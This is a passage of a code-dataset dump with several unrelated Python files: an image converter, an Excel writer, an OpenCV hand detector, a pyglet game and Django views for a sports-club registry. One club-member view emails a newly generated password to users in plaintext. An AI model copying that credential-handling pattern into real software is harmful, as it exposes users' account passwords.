Image\nimport shutil\nimport sys\nimage_size=144\n#改变之后的图片尺寸\n\nsource_path=os.getcwd()+\"/image/\"#等待转换的图片存放地址\ntypes='png' #转换后的图片格式\ntarget_path=os.getcwd()+\"/changepng/\"#转换过格式的图片存放地址\nfinal_path=os.getcwd()+\"/final/\"# 转换过格式和尺寸的图片存放地址\n\n#如果没有转换后的图片存放文件夹,就创建对应的文件夹\nif not os.path.exists(target_path):\n os.makedirs(target_path)\nif not os.path.exists(final_path):\n os.makedirs(final_path)\n\ndef changepng(source_path,types):\n files = []\n image_list=os.listdir(source_path)\n #print(image_list)\n files = [os.path.join(source_path,_) for _ in image_list]\n for index,jpg in enumerate(files):\n if index > 1000:\n break\n try:\n sys.stdout.write('\\r>>Converting image %d/100000 ' % (index))\n sys.stdout.flush()\n im = Image.open(jpg)\n png = os.path.splitext(jpg)[0] + \".\" + types\n im.save(png)\n shutil.move(png,target_path)\n except IOError as e:\n print('could not read:',jpg)\n print('error:',e)\n print('skip it\\n')\n sys.stdout.write('Convert Over!\\n')\n sys.stdout.flush()\n\n\nif __name__ == '__main__':\n path = r\"F:\\untitled7\\get_html\\imgs\"\n changepng(path, \"png\")\n","sub_path":"test1/test03.py","file_name":"test03.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"253184342","text":"import openpyxl\n\nclass Write_excel_xlsx_append(object):\n def __init__(self, path, value, sheet_name):\n self.path = path\n self.value = value\n self.sheet_name = sheet_name\n\n def write_excel_xlsx_append(self):\n \"\"\"向xls文件内写入(追加)内容\"\"\"\n\n # 写入内容格式[[], [],[]..]\n # 写��内容行数\n index = len(self.value)\n # 读模式打开文件\n work_book = openpyxl.load_workbook(self.path)\n # 定位sheet页\n work_sheet = work_book[self.sheet_name]\n # sheet页数据行数\n rows_old = work_sheet.max_row\n rows = lambda x: x-1 if x else 0\n row_old_real = rows(rows_old)\n print('原sheet页数据行数为: %s' % (row_old_real))\n # 追加内容\n for i in range(1, index+1):\n for j in range(1, len(self.value[i-1])+1):\n work_sheet.cell(rows_old+i-1, j).value = self.value[i-1][j-1]\n print('写入完成,%s页数据行数为: %s' % (self.sheet_name, rows_old + index))\n # 保存文件\n work_book.save(self.path)\n print('新数据保存成功')\n\n","sub_path":"read_write_apend_xlsx/write_xlsx.py","file_name":"write_xlsx.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"547294470","text":"import cv2\n\nimport numpy as np\n\n\ndef Find(path):\n # 창 이름 설정\n\n cv2.namedWindow('image')\n\n # 이미지 파일 읽기\n\n img = cv2.imread(path, cv2.IMREAD_COLOR)\n\n # 이미지 사이즈 조정\n\n img = Resize(img)\n\n # 이미지 색 바꾸기\n\n # img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # img_ycrcb = cv2.cvtColor(img, cv2.COLOR_BGR2YCrCb)\n\n img_hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n\n # 잡음 제거\n\n img_hsv = cv2.fastNlMeansDenoisingColored(img_hsv, None, 10, 10, 7, 21)\n\n lower = np.array([0, 48, 80], dtype=\"uint8\")\n\n upper = np.array([20, 255, 255], dtype=\"uint8\")\n\n img_hand = cv2.inRange(img_hsv, lower, upper)\n\n # 경계선 찾음\n\n contours, hierarchy = cv2.findContours(img_hand, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n\n # 가장 큰 영역 찾기\n\n max = 0\n\n maxcnt = None\n\n for cnt in contours:\n\n area = cv2.contourArea(cnt)\n\n if (max < area):\n max = area\n\n maxcnt = cnt\n\n # maxcontours의 각 꼭지점 다각선 만들기\n\n hull = cv2.convexHull(maxcnt)\n\n # img 다 0으로 만들기?\n\n mask = np.zeros(img.shape).astype(img.dtype)\n\n color = [255, 255, 255]\n\n # 경계선 내부 255로 채우기\n\n cv2.fillPoly(mask, [maxcnt], color)\n\n img_hand = cv2.bitwise_and(img, mask)\n\n cv2.drawContours(img_hand, [maxcnt], 0, (255, 0, 0), 3)\n\n cv2.drawContours(img_hand, [hull], 0, (0, 255, 0), 3)\n\n # 이미지 보여주기\n\n cv2.imshow('image', img_hand)\n\n # 창 esc 끄기\n\n while True:\n\n if cv2.waitKey(0) == 27:\n cv2.destroyWindow('image')\n\n break;\n\n return\n\n\ndef Resize(img):\n print(img.shape)\n\n width = 500\n\n ratio = width / img.shape[1] # width * 사진 너비 = 비율\n\n height = int(ratio * img.shape[0]) # 비율 * 사진 높이\n\n # 축소 INTER_AREA\n\n # 확대 INTER_LINEAR\n\n resize = cv2.resize(img, dsize=(width, height), interpolation=cv2.INTER_AREA)\n\n # resize = cv2.resize(img, dsize = (0, 0), fx=1.5, fy=1.5, interpolation = cv2.INTER_AREA)\n\n print(resize.shape)\n\n return resize\n\n\n\nFind(\"ok3.jpg\")\n\n\n\n","sub_path":"python_source/딥러닝/hand.py","file_name":"hand.py","file_ext":"py","file_size_in_byte":2152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"246446368","text":"##### IMPORT #####\nimport pyglet, random, math\nfrom pyglet import font\nfrom classes import Player, Feather, RotatingSprite, Window, Poetry\nfrom pyglet.window import mouse\n\n##### USEFUL SIMPLE FUNCTIONS #####\ndef center_image(image):\n \"\"\"\n Sets an image's anchor point to its center\n :param image: image\n :return: None\n \"\"\"\n image.anchor_x = image.width // 2 # put the anchor of the image at the half of its width\n image.anchor_y = image.height // 2 # put the anchor of the image at the half of its height\n\ndef distance(point_1=(0, 0), point_2=(0, 0)):\n '''\n Calculates the distance between two points.\n :param point_1: tuple\n :param point_2: tuple\n :return: float\n '''\n return math.sqrt(\n (point_1[0] - point_2[0]) ** 2 +\n (point_1[1] - point_2[1]) ** 2) # pythagore\n\n##### MUSIC #####\nmusicSource = pyglet.media.load('resources/sound/violin.wav')\nmusic = pyglet.media.Player()\nmusic.volume = 0.0005\n#Keep playing for as long as the app is running (or you tell it to stop):\nmusic.eos_action = pyglet.media.SourceGroup.loop\n\n##### GAME WINDOW #####\ngame_window = Window()\nx = game_window.width\ny = game_window.height\ngame = False #State of the game, on or off\n\n##### WALLPAPER #####\nwallpaper = pyglet.resource.image('resources/sprites/wallpaper.jpg')\nwallpaper_sprite = pyglet.sprite.Sprite(img=wallpaper, x=0, y=0)\n\n##### MENU ####\nclose_img = pyglet.resource.image('resources/sprites/close_game.png')\nclose_img2 = pyglet.resource.image('resources/sprites/close_game_grey.png')\nclose_scale = close_img.height/close_img.width\nclose = pyglet.sprite.Sprite(img=close_img,\n x=close_img.width*close_scale//4,\n y=y-int(2*close_img.height*close_scale)) #set position of close image\nclose.scale = close_scale\n\nrestart_img = pyglet.resource.image('resources/sprites/restart_game.png')\nrestart_img2 = pyglet.resource.image('resources/sprites/restart_game_grey.png')\nrestart_scale = restart_img.height/restart_img.width\nrestart = pyglet.sprite.Sprite(img=restart_img,\n x=restart_img.width*restart_scale//4,\n y=y-int(3.5*restart_img.height*restart_scale)) #set position of restart image\nrestart.scale = restart_scale\n\n##### BATCH #####\nbatch = pyglet.graphics.Batch()\n\n##### PARCHMENT #####\nparchment_image = pyglet.resource.image('resources/sprites/parchment.png')\ncenter_image(parchment_image)\nparchment_scale = parchment_image.height/parchment_image.width #Scale of the parchment\nparchment = pyglet.sprite.Sprite(img=parchment_image,\n x=x//2,\n y=parchment_image.height//2 + 20)\n\n##### PLAYER #####\nplayer_image = pyglet.resource.image('resources/sprites/player.png')\ncenter_image(player_image)\nplayer_sprite = Player(img=player_image,\n x=x//2,\n y=(y+2*parchment.y)//2,\n batch=batch) # set position of player as a Player instance\ngame_window.push_handlers(player_sprite)\n\n##### PLAYER LIVES #####\nplayer_lives = 3\nlive = pyglet.text.Label('Lives : ' + str(player_lives),\n font_name='Times New Roman',\n font_size=x/30,\n x=x-x//10, y=y-y//15,\n anchor_x='center', anchor_y='center')\n\n##### CIRCLE SEGMENTS #####\ncircle_segment = pyglet.resource.image(\"resources/sprites/circle_segment.png\")\ncenter_image(circle_segment)\n#Load the 15 segments with the RotatingSprite class\nfor i in range(15):\n angle_degrees = (360/15)*i # set the angle of every segment\n angle_radians = math.radians(angle_degrees)\n xc, yc = (x//2, (y+2*parchment.y)//2)\n r = x//6 #radius of the circle\n segment = RotatingSprite(angle_radians=angle_radians,\n r=r, xc=xc, yc=yc,\n word=RotatingSprite.words[i], img=circle_segment, batch=batch)\n RotatingSprite.segments.append(segment) #add the segment to the list which is updated\n RotatingSprite.all_segments.append(segment)\n\n##### POETRY #####\npoem = Poetry()\npoem.initialize()\nline = 0 #actual line of the poetry\n\n##### INRODUCTION AND GAME OVER LABEL #####\nintro_text = pyglet.text.Label('Press left mouse button to start',\n font_name='Times New Roman',\n font_size=x/30,\n italic=True,\n x=x//2, y=y//2,\n anchor_x='center', anchor_y='center')\n\ngame_over = pyglet.text.Label('Game Over',\n font_name='Times New Roman',\n font_size=x/30,\n italic=True,\n x=x//2, y=y//2,\n anchor_x='center', anchor_y='center')\n\nrestart_text = pyglet.text.Label('Press left mouse button to restart',\n font_name='Times New Roman',\n font_size=x/30,\n italic=True,\n x=x//2, y=y//3,\n anchor_x='center', anchor_y='center')\n\n##### GAME FUNCTIONS #####\ndef write_towards(poetry):\n global line\n toward = poetry.split_poetry()\n msg = ' '.join(toward[line]) #take the first verse\n label = pyglet.text.Label(str(msg),\n font_name='Times New Roman',\n font_size=18,\n color=(75, 0, 130, 255),\n x=parchment.x, y=parchment.y,\n anchor_x='center', anchor_y='center')\n label.draw() #write the sentence on the parchment\n\ndef chargeBar(player_sprite, player_image):\n '''\n Draws the line for the reloading time.\n :param player_sprite: sprite\n :param player_image: image\n :return: None\n '''\n player_start = player_sprite.x - player_sprite.width // 2\n\n pyglet.graphics.draw(2, pyglet.gl.GL_LINES,\n (\"v2f\", (player_start, player_sprite.y-(player_image.height)/1.2, player_start+2*(player_sprite.width*(player_sprite.reloading/60)), player_sprite.y-(player_image.height)/1.2))\n )\n pyglet.graphics.draw(2, pyglet.gl.GL_LINES,\n (\"v2f\", (player_start, player_sprite.y-(player_image.height)/1.2+1, player_start+2*(player_sprite.width*(player_sprite.reloading/60)), player_sprite.y-(player_image.height)/1.2+1))\n )\n pyglet.graphics.draw(2, pyglet.gl.GL_LINES,\n (\"v2f\", (player_start, player_sprite.y-(player_image.height)/1.2+2, player_start+2*(player_sprite.width*(player_sprite.reloading/60)), player_sprite.y-(player_image.height)/1.2+2))\n )\n pyglet.graphics.draw(2, pyglet.gl.GL_LINES,\n (\"v2f\", (player_start, player_sprite.y-(player_image.height)/1.2+3, player_start+2*(player_sprite.width*(player_sprite.reloading/60)), player_sprite.y-(player_image.height)/1.2+3))\n )\n\ndef in_sprite(sprite, x, y):\n '''\n Verifies if the coordonates (x, y) are in the sprite\n :param sprite: sprite\n :param x: int\n :param y: int\n :return: bool\n '''\n res = sprite.x <= x <= sprite.x + sprite.width and sprite.y <= y <= sprite.y + sprite.height\n return res\n\n@game_window.event\ndef on_draw():\n '''\n The draw function.\n :return: None\n '''\n global game, player_lives\n game_window.clear()\n wallpaper_sprite.draw()\n if game:\n restart.draw()\n close.draw()\n live.draw()\n game_window.fps_display.draw()\n parchment.draw()\n #Draw the player and the segments\n batch.draw()\n write_towards(poem)\n #Draw the segments\n for segment in RotatingSprite.segments:\n segment.label.draw()\n #Draw the reloading line\n chargeBar(player_sprite, player_image)\n #Draw every projectile\n for feather in Feather.feathers:\n feather.draw()\n #Draw the dead feathers\n for obj in RotatingSprite.intert_objects:\n obj.draw()\n else:\n if player_lives > 0:\n intro_text.draw()\n else:\n game_over.draw()\n restart_text.draw()\n\n@game_window.event\ndef on_mouse_press(x, y, button, modifiers):\n global game\n if mouse.LEFT == True:\n if game: #if the game is on or off\n if in_sprite(restart, x, y): #condition to press on the button\n game_restart()\n elif in_sprite(close, x, y):\n pyglet.app.exit()\n else:\n game_restart()\n game = True\n \n@game_window.event\ndef on_mouse_motion(x, y, dx, dy):\n '''\n Controls the animation of the two buttons.\n :return: None\n '''\n if restart.image == restart_img and in_sprite(restart, x, y): #turn the image in grey when mouse is on the restart button\n restart.image = restart_img2\n elif restart.image != restart_img and not in_sprite(restart, x, y):\n restart.image = restart_img\n\n if close.image == close_img and in_sprite(close, x, y): #turn the image in grey when mouse is on the close button\n close.image = close_img2\n elif close.image != close_img and not in_sprite(close, x, y):\n close.image = close_img\n\ndef game_restart():\n '''\n Restart the game and set all variables to their beginning state.\n '''\n global player_lives, line\n RotatingSprite.dead_segments.reverse() #segments in the order of their death\n for segment in RotatingSprite.dead_segments: # transform all dead segments back in segments but in the right order (reverse)\n segment.relive()\n RotatingSprite.words.insert(0, segment.word)\n RotatingSprite.dead_segments.clear() # clear the dead_segment list when restart\n RotatingSprite.intert_objects.clear() # clear the dead feathers when restart\n player_lives = 3\n line = 0\n\ndef update(dt):\n '''\n Updates the game objects every frame (60 times per second)\n :param dt: float\n :return: None\n '''\n global line, player_lives, game, live\n if game:\n player_sprite.update(dt)\n if len(Feather.feathers) > 0:\n for feather in Feather.feathers: # update position of all dead segments\n feather.update_position(dt)\n if len(RotatingSprite.segments) > 0:\n for segment in RotatingSprite.segments: # update position of all segments\n segment.update(dt)\n if len(RotatingSprite.dead_segments) > 0:\n for dead_segment in RotatingSprite.dead_segments: # update position of all dead segments\n dead_segment.update(dt)\n if len(RotatingSprite.intert_objects) > 0:\n for obj in RotatingSprite.intert_objects: #update position of the dead feathers\n obj.update(dt)\n\n if player_lives > 0:\n live.text = 'Lives : ' + str(player_lives)\n else:\n game = False\n\n ### Collision\n for feather in Feather.feathers:\n already_dead = False #prevent the delete of two segments with the same feather\n already_hit = False #prevent the delete of two lives with the same feather\n if distance(point_1=(feather.x, feather.y), point_2=(xc, yc)) > r - circle_segment.height//2: # check when a feather reaches the segments \n feather.dead = True # kill the feather\n if len(RotatingSprite.segments) > 0:\n for segment in RotatingSprite.all_segments: #even the dead segments\n if distance(point_1=(feather.x, feather.y), point_2=(segment.x, segment.y)) < 1.27 * r * math.sin(math.radians(360/15)/2): # check which segments is hit by the feather\n if not already_dead: # kill the segment if the feather has not kill one already\n if segment.word == RotatingSprite.words[0]:\n line += 1\n segment.dead = True\n segment.update(dt) # update the next segment in segment list (to prevent a bug)\n already_dead = True\n elif not already_hit:\n if player_lives > 0:\n player_lives -= 1\n already_hit = True\n else:\n print('Win')\n else:\n pass\n\nif __name__ == \"__main__\":\n\n pyglet.clock.schedule_interval(update, game_window.frame_rate) #Activate the update function (60 Hz)\n\n music.queue(musicSource)\n music.play()\n \n pyglet.app.run()","sub_path":"usr/duc/good project/circles.py","file_name":"circles.py","file_ext":"py","file_size_in_byte":12504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"9450173","text":"from idlelib.idle_test.test_run import S\nfrom itertools import product\n\nfrom django.contrib.auth import logout, update_session_auth_hash\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.forms import SetPasswordForm\nfrom django.contrib.auth.models import User, Group\nfrom django.contrib import messages\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.db.models import Q\nfrom django.http import JsonResponse, HttpResponseRedirect\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse\n\nfrom sbs.Forms.BeltExamForm import BeltExamForm\nfrom sbs.Forms.ClubForm import ClubForm\nfrom sbs.Forms.ClubRoleForm import ClubRoleForm\nfrom sbs.Forms.CommunicationForm import CommunicationForm\nfrom sbs.Forms.DisabledCommunicationForm import DisabledCommunicationForm\nfrom sbs.Forms.DisabledPersonForm import DisabledPersonForm\nfrom sbs.Forms.DisabledSportClubUserForm import DisabledSportClubUserForm\nfrom sbs.Forms.DisabledUserForm import DisabledUserForm\nfrom sbs.Forms.PersonForm import PersonForm\nfrom sbs.Forms.SportClubUserForm import SportClubUserForm\nfrom sbs.Forms.UserForm import UserForm\nfrom sbs.Forms.SearchClupForm import SearchClupForm\nfrom sbs.Forms.PreRegidtrationForm import PreRegistrationForm\nfrom sbs.Forms.UserSearchForm import UserSearchForm\nfrom sbs.Forms.ClupUserSearchForm import ClubSearchForm\n\nfrom sbs.models import SportsClub, SportClubUser, Communication, Person, BeltExam, Athlete, Coach, Level, CategoryItem, \\\n License\nfrom sbs.models.ClubRole import ClubRole\nfrom sbs.models.EnumFields import EnumFields\nfrom sbs.models.PreRegistration import PreRegistration\nfrom sbs.services import general_methods\nfrom datetime import date,datetime\nimport datetime\nfrom django.utils import timezone\n\nfrom zeep import Client\n# from sbs.models.Person import Person\n# from sbs.models.PreRegistration import PreRegistration\nfrom sbs.models.ReferenceReferee import ReferenceReferee\nfrom sbs.models.ReferenceCoach import ReferenceCoach\n\nfrom django.contrib.auth.models import Group, Permission, User\nfrom operator import itemgetter\n@login_required\ndef return_add_club(request):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n club_form = ClubForm()\n communication_form = CommunicationForm()\n\n if request.method == 'POST':\n\n club_form = ClubForm(request.POST, request.FILES or None)\n communication_form = CommunicationForm(request.POST, request.FILES)\n\n if club_form.is_valid():\n clubsave = SportsClub(name=club_form.cleaned_data['name'],\n shortName=club_form.cleaned_data['shortName'],\n foundingDate=club_form.cleaned_data['foundingDate'],\n logo=club_form.cleaned_data['logo'],\n clubMail=club_form.cleaned_data['clubMail'],\n isFormal=club_form.cleaned_data['isFormal'],\n petition=club_form.cleaned_data['petition'],\n\n )\n\n communication = communication_form.save(commit=False)\n communication.save()\n clubsave.communication = communication\n\n clubsave.save()\n\n log = str(club_form.cleaned_data['name']) + \" Klup eklendi\"\n log = general_methods.logwrite(request, request.user, log)\n\n\n\n\n messages.success(request, 'Kulüp Başarıyla Kayıt Edilmiştir.')\n\n return redirect('sbs:kulupler')\n\n else:\n\n messages.warning(request, 'Alanları Kontrol Ediniz')\n\n return render(request, 'kulup/kulup-ekle.html',\n {'club_form': club_form, 'communication_form': communication_form})\n\n\n@login_required\ndef return_clubs(request):\n perm = general_methods.control_access_klup(request)\n\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n user = request.user\n clubs = SportsClub.objects.none()\n ClupsSearchForm=ClubSearchForm(request.POST)\n if user.groups.filter(name='KulupUye'):\n clubuser = SportClubUser.objects.get(user=user)\n clubs = SportsClub.objects.filter(clubUser=clubuser).order_by(\"-pk\")\n\n if request.method == 'POST':\n\n if ClupsSearchForm.is_valid():\n kisi = ClupsSearchForm.cleaned_data.get('kisi')\n city = ClupsSearchForm.cleaned_data.get('city')\n name = ClupsSearchForm.cleaned_data.get('name')\n shortName = ClupsSearchForm.cleaned_data.get('shortName')\n clubMail = ClupsSearchForm.cleaned_data.get('clubMail')\n if not (kisi or city or name or shortName or clubMail):\n if user.groups.filter(name='KulupUye'):\n clubuser = SportClubUser.objects.get(user=user)\n clubs = SportsClub.objects.filter(clubUser=clubuser).order_by(\"-pk\")\n\n elif user.groups.filter(name__in=['Yonetim', 'Admin']):\n clubs = SportsClub.objects.all().order_by(\"-pk\")\n\n else:\n query = Q()\n if city:\n query &= Q(communication__city__name__icontains=city)\n if name:\n query &= Q(name__icontains=name)\n if clubMail:\n query &= Q(clubMail__icontains=clubMail)\n if shortName:\n query &= Q(shortName__icontains=shortName)\n if kisi:\n query &= Q(clubUser=kisi)\n if user.groups.filter(name='KulupUye'):\n clubuser = SportClubUser.objects.get(user=user)\n clubs = SportsClub.objects.filter(clubUser=clubuser).filter(query)\n\n elif user.groups.filter(name__in=['Yonetim', 'Admin']):\n clubs = SportsClub.objects.filter(query)\n\n return render(request, 'kulup/kulupler.html', {'clubs': clubs, 'ClupsSearchForm': ClupsSearchForm, })\n\n\n@login_required\ndef return_add_club_person(request):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n user_form = UserForm()\n person_form = PersonForm()\n communication_form = CommunicationForm()\n sportClubUser_form = SportClubUserForm()\n if request.method == 'POST':\n\n user_form = UserForm(request.POST)\n person_form = PersonForm(request.POST, request.FILES)\n communication_form = CommunicationForm(request.POST, request.FILES)\n sportClubUser_form = SportClubUserForm(request.POST)\n\n mail = request.POST.get('email')\n\n if User.objects.filter(email=mail) or ReferenceCoach.objects.exclude(status=ReferenceCoach.DENIED).filter(\n email=mail) or ReferenceReferee.objects.exclude(status=ReferenceReferee.DENIED).filter(\n email=mail) or PreRegistration.objects.exclude(status=PreRegistration.DENIED).filter(\n email=mail):\n messages.warning(request, 'Mail adresi başka bir kullanici tarafından kullanilmaktadir.')\n return render(request, 'kulup/kulup-uyesi-ekle.html',\n {'user_form': user_form, 'person_form': person_form, 'communication_form': communication_form,\n 'sportClubUser_form': sportClubUser_form,\n })\n\n tc = request.POST.get('tc')\n if Person.objects.filter(tc=tc) or ReferenceCoach.objects.exclude(status=ReferenceCoach.DENIED).filter(\n tc=tc) or ReferenceReferee.objects.exclude(status=ReferenceReferee.DENIED).filter(\n tc=tc) or PreRegistration.objects.exclude(status=PreRegistration.DENIED).filter(tc=tc):\n messages.warning(request, 'Tc kimlik numarasi sisteme kayıtlıdır. ')\n return render(request, 'kulup/kulup-uyesi-ekle.html',\n {'user_form': user_form, 'person_form': person_form, 'communication_form': communication_form,\n 'sportClubUser_form': sportClubUser_form,\n })\n\n name = request.POST.get('first_name')\n surname = request.POST.get('last_name')\n year = request.POST.get('birthDate')\n year = year.split('/')\n\n client = Client('https://tckimlik.nvi.gov.tr/Service/KPSPublic.asmx?WSDL')\n if not (client.service.TCKimlikNoDogrula(tc, name, surname, year[2])):\n messages.warning(request, 'Tc kimlik numarasi ile isim soyisim dogum yılı bilgileri uyuşmamaktadır. ')\n return render(request, 'kulup/kulup-uyesi-ekle.html',\n {'user_form': user_form, 'person_form': person_form, 'communication_form': communication_form,\n 'sportClubUser_form': sportClubUser_form,\n })\n\n if user_form.is_valid() and person_form.is_valid() and communication_form.is_valid() and sportClubUser_form.is_valid():\n user = User()\n user.username = user_form.cleaned_data['email']\n user.first_name = user_form.cleaned_data['first_name']\n user.last_name = user_form.cleaned_data['last_name']\n user.email = user_form.cleaned_data['email']\n group = Group.objects.get(name='KulupUye')\n password = User.objects.make_random_password()\n user.set_password(password)\n user.save()\n user.groups.add(group)\n user.save()\n\n person = person_form.save(commit=False)\n communication = communication_form.save(commit=False)\n person.save()\n communication.save()\n\n club_person = SportClubUser(\n user=user, person=person, communication=communication,\n role=sportClubUser_form.cleaned_data['role'],\n\n )\n\n club_person.save()\n\n subject, from_email, to = 'Halter - Kulüp Üye Bilgi Sistemi Kullanıcı Giriş Bilgileri', 'no-reply@twf.gov.tr', user.email\n text_content = 'Aşağıda ki bilgileri kullanarak sisteme giriş yapabilirsiniz.'\n html_content = '

Site adresi: https://sbs.halter.gov.tr

'\n html_content = html_content + '

Kullanıcı Adı: ' + user.username + '

'\n html_content = html_content + '

Şifre: ' + password + '

'\n msg = EmailMultiAlternatives(subject, text_content, from_email, [to])\n msg.attach_alternative(html_content, \"text/html\")\n msg.send()\n\n log = str(user.get_full_name()) + \" Klupuyesi eklendi\"\n log = general_methods.logwrite(request, request.user, log)\n\n\n\n\n messages.success(request, 'Kulüp Üyesi Başarıyla Kayıt Edilmiştir.')\n\n return redirect('sbs:kulup-uyeleri')\n\n else:\n\n for x in user_form.errors.as_data():\n messages.warning(request, user_form.errors[x][0])\n\n return render(request, 'kulup/kulup-uyesi-ekle.html',\n {'user_form': user_form, 'person_form': person_form, 'communication_form': communication_form,\n 'sportClubUser_form': sportClubUser_form,\n })\n\n\n@login_required\ndef updateClubPersons(request, pk):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n athlete = SportClubUser.objects.get(pk=pk)\n user = User.objects.get(pk=athlete.user.pk)\n person = Person.objects.get(pk=athlete.person.pk)\n communication = Communication.objects.get(pk=athlete.communication.pk)\n # sportClub = athlete.sportClub\n user_form = UserForm(request.POST or None, instance=user)\n person_form = PersonForm(request.POST or None, request.FILES or None, instance=person)\n communication_form = CommunicationForm(request.POST or None, instance=communication)\n sportClubUser_form = SportClubUserForm(request.POST or None, instance=athlete)\n clubs = SportsClub.objects.filter(clubUser__user=user)\n\n if request.method == 'POST':\n mail = request.POST.get('email')\n if mail != athlete.user.email:\n\n if User.objects.filter(email=mail) or ReferenceCoach.objects.exclude(status=ReferenceCoach.DENIED).filter(\n email=mail) or ReferenceReferee.objects.exclude(status=ReferenceReferee.DENIED).filter(\n email=mail) or PreRegistration.objects.exclude(status=PreRegistration.DENIED).filter(\n email=mail):\n messages.warning(request, 'Mail adresi başka bir kullanici tarafından kullanilmaktadir.')\n return render(request, 'kulup/kulup-uyesi-duzenle.html',\n {'user_form': user_form, 'communication_form': communication_form,\n 'person_form': person_form, 'sportClubUser_form': sportClubUser_form, 'clubs': clubs})\n\n tc = request.POST.get('tc')\n if tc != athlete.person.tc:\n if Person.objects.filter(tc=tc) or ReferenceCoach.objects.exclude(status=ReferenceCoach.DENIED).filter(\n tc=tc) or ReferenceReferee.objects.exclude(status=ReferenceReferee.DENIED).filter(\n tc=tc) or PreRegistration.objects.exclude(status=PreRegistration.DENIED).filter(tc=tc):\n messages.warning(request, 'Tc kimlik numarasi sisteme kayıtlıdır. ')\n return render(request, 'kulup/kulup-uyesi-duzenle.html',\n {'user_form': user_form, 'communication_form': communication_form,\n 'person_form': person_form, 'sportClubUser_form': sportClubUser_form, 'clubs': clubs})\n\n name = request.POST.get('first_name')\n surname = request.POST.get('last_name')\n year = request.POST.get('birthDate')\n year = year.split('/')\n\n client = Client('https://tckimlik.nvi.gov.tr/Service/KPSPublic.asmx?WSDL')\n if not (client.service.TCKimlikNoDogrula(tc, name, surname, year[2])):\n messages.warning(request, 'Tc kimlik numarasi ile isim soyisim dogum yılı bilgileri uyuşmamaktadır. ')\n return render(request, 'kulup/kulup-uyesi-duzenle.html',\n {'user_form': user_form, 'communication_form': communication_form,\n 'person_form': person_form, 'sportClubUser_form': sportClubUser_form, 'clubs': clubs})\n\n if user_form.is_valid() and communication_form.is_valid() and person_form.is_valid() and sportClubUser_form.is_valid():\n\n user = user_form.save(commit=False)\n user.username = user_form.cleaned_data['email']\n user.first_name = user_form.cleaned_data['first_name']\n user.last_name = user_form.cleaned_data['last_name']\n user.email = user_form.cleaned_data['email']\n user.save()\n person_form.save()\n communication_form.save()\n sportClubUser_form.save()\n\n log = str(user.get_full_name()) + \" klup uyesi guncellendi\"\n log = general_methods.logwrite(request, request.user, log)\n\n\n\n messages.success(request, 'Kulüp Üyesi Başarıyla Güncellenmiştir.')\n\n # return redirect('sbs:kulup-uyeleri')\n\n else:\n\n for x in user_form.errors.as_data():\n messages.warning(request, user_form.errors[x][0])\n\n return render(request, 'kulup/kulup-uyesi-duzenle.html',\n {'user_form': user_form, 'communication_form': communication_form,\n 'person_form': person_form, 'sportClubUser_form': sportClubUser_form, 'clubs': clubs})\n\n\n@login_required\ndef return_club_coach(request):\n perm = general_methods.control_access_klup(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n\n user_form = UserSearchForm()\n user = request.user\n club_user_array = SportClubUser.objects.none()\n coachs = Coach.objects.none()\n if request.method == 'POST':\n user_form = UserSearchForm(request.POST)\n sportsclup = request.POST.get('sportsClub')\n\n if user_form.is_valid():\n firstName = user_form.cleaned_data.get('first_name')\n lastName = user_form.cleaned_data.get('last_name')\n email = user_form.cleaned_data.get('email')\n if not (firstName or lastName or email or sportsclup):\n if user.groups.filter(name='KulupUye'):\n\n clubuser = SportClubUser.objects.get(user=user)\n clubs = SportsClub.objects.filter(clubUser=clubuser)\n clubsPk = []\n\n for club in clubs:\n coachs |= club.coachs.all().distinct()\n\n\n elif user.groups.filter(name__in=['Yonetim', 'Admin']):\n club_user_array = Coach.objects.all()\n else:\n query = Q()\n if lastName:\n query &= Q(user__last_name__icontains=lastName)\n if firstName:\n query &= Q(user__first_name__icontains=firstName)\n if email:\n query &= Q(user__email__icontains=email)\n if sportsclup:\n query &= Q(sportsclub__name__icontains=sportsclup)\n\n if user.groups.filter(name='KulupUye'):\n\n clubuser = SportClubUser.objects.get(user=user)\n clubs = SportsClub.objects.filter(clubUser=clubuser)\n for club in clubs:\n coachs |= club.coachs.all().distinct()\n\n coachs = coachs.filter(query).distinct()\n\n\n elif user.groups.filter(name__in=['Yonetim', 'Admin']):\n clubs = SportsClub.objects.all()\n for club in clubs:\n coachs |= club.coachs.all().distinct()\n\n coachs = coachs.filter(query).distinct()\n coachs = Coach.objects.filter(query).distinct()\n\n sportclup = SearchClupForm(request.POST, request.FILES or None)\n if user.groups.filter(name='KulupUye'):\n sc_user = SportClubUser.objects.get(user=user)\n clubs = SportsClub.objects.filter(clubUser=sc_user)\n clubsPk = []\n for club in clubs:\n clubsPk.append(club.pk)\n sportclup.fields['sportsClub'].queryset = SportsClub.objects.filter(id__in=clubsPk)\n elif user.groups.filter(name__in=['Yonetim', 'Admin']):\n sportclup.fields['sportsClub'].queryset = SportsClub.objects.all()\n\n return render(request, 'kulup/kulup-antrenorler.html',\n {'athletes': coachs, 'user_form': user_form, 'Sportclup': sportclup})\n\n\n@login_required\ndef return_rapor_club(request):\n perm = general_methods.control_access(request)\n\n if not perm:\n logout(request)\n return redirect('accounts:login')\n\n return render(request, 'kulup/kulupRapor.html')\n\n\n@login_required\ndef return_clup(request):\n # print('ben geldim')\n login_user = request.user\n user = User.objects.get(pk=login_user.pk)\n\n # /datatablesten gelen veri kümesi datatables degiskenine alindi\n if request.method == 'GET':\n datatables = request.GET\n print(datatables)\n\n\n elif request.method == 'POST':\n datatables = 